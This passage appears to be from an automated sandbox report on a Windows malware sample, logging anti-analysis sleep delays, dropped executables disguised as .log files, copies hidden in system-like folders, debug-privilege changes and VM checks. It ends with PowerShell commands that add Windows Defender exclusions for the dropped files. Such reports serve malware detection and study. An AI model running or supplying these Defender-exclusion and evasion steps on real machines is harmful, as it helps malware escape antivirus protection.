Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 584859
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583973
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583703
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583525
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583381
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582703
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582561
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582448
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582344
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582149
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582032
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581906
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581788
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581656
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 300000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581547
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581431
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581313
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581192
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581059
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580953
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580797
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580625
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580516
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580404
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580295
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580171
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580062

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2685	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2684	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1866	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3133
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2191
Source: C:\Recovery\opHipgZM6eS.exe	Window / User API: threadDelayed 9521

Source: C:\Recovery\opHipgZM6eS.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\evmDrQmW.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OUqOeHbA.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ySkKLEmm.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hyhVOtKH.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mdQBMGyp.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RZKXfllq.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DsQyKcEJ.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YLtwtTHn.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IoSQRIuD.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oeGTbsrD.log	Jump to dropped file

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe TID: 3132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 2685 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep count: 2684 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep count: 1866 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep count: 3133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep count: 1813 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep count: 2191 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\CbsTemp\ctfmon.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\CbsTemp\ctfmon.exe TID: 2332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe TID: 8156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 6040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\RuntimeBroker.exe TID: 2892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\RuntimeBroker.exe TID: 7716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe TID: 7768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe TID: 7360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe TID: 5308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 5940	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -599872s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -599625s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -598907s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -598610s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 1880	Thread sleep time: -36000000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -100000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -99781s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -99500s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -99109s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -98875s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -98203s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -596110s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -595735s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -595485s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -594969s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -594641s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -594297s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -593719s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -593360s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -593032s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -592688s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -592157s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -591782s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -591297s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -590828s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -590453s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -590245s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -589891s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -589594s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -589219s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -588719s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -588360s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -587985s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -586889s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -586438s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -586000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -585679s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -585201s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -584859s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -583973s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -583703s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -583525s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -583381s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582703s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582561s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582448s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582344s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582149s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -582032s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581906s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581788s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581656s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 1880	Thread sleep time: -300000s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581547s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581431s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581313s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581192s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -581059s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580953s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580797s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580625s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580516s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580404s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580295s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580171s >= -30000s
Source: C:\Recovery\opHipgZM6eS.exe TID: 4284	Thread sleep time: -580062s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2476	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\CbsTemp\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\CbsTemp\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\opHipgZM6eS.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\opHipgZM6eS.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\opHipgZM6eS.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 30000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 599872
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 599625
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 598907
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 598610
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 100000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 99781
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 99500
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 99109
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 98875
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 98203
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 596110
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 595735
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 595485
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594969
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594641
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594297
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593719
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593360
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593032
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 592688
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 592157
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 591782
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 591297
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590828
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590453
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590245
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589891
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589594
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589219
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 588719
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 588360
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 587985
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586889
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586438
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 585679
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 585201
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 584859
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583973
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583703
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583525
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 583381
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582703
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582561
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582448
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582344
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582149
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 582032
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581906
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581788
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581656
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 300000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581547
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581431
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581313
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581192
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 581059
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580953
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580797
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580625
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580516
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580404
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580295
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580171
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 580062

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: SfbAu0ICZn.exe, 00000000.00000002.1791771584.000000001C246000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SfbAu0ICZn.exe, 00000000.00000002.1783053767.000000001C159000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\CbsTemp\ctfmon.exe	Process token adjusted: Debug
Source: C:\Windows\CbsTemp\ctfmon.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Process token adjusted: Debug
Source: C:\Recovery\opHipgZM6eS.exe	Process token adjusted: Debug
Source: C:\Recovery\opHipgZM6eS.exe	Process token adjusted: Debug
Source: C:\Recovery\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Recovery\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Process token adjusted: Debug
Source: C:\Recovery\opHipgZM6eS.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe'
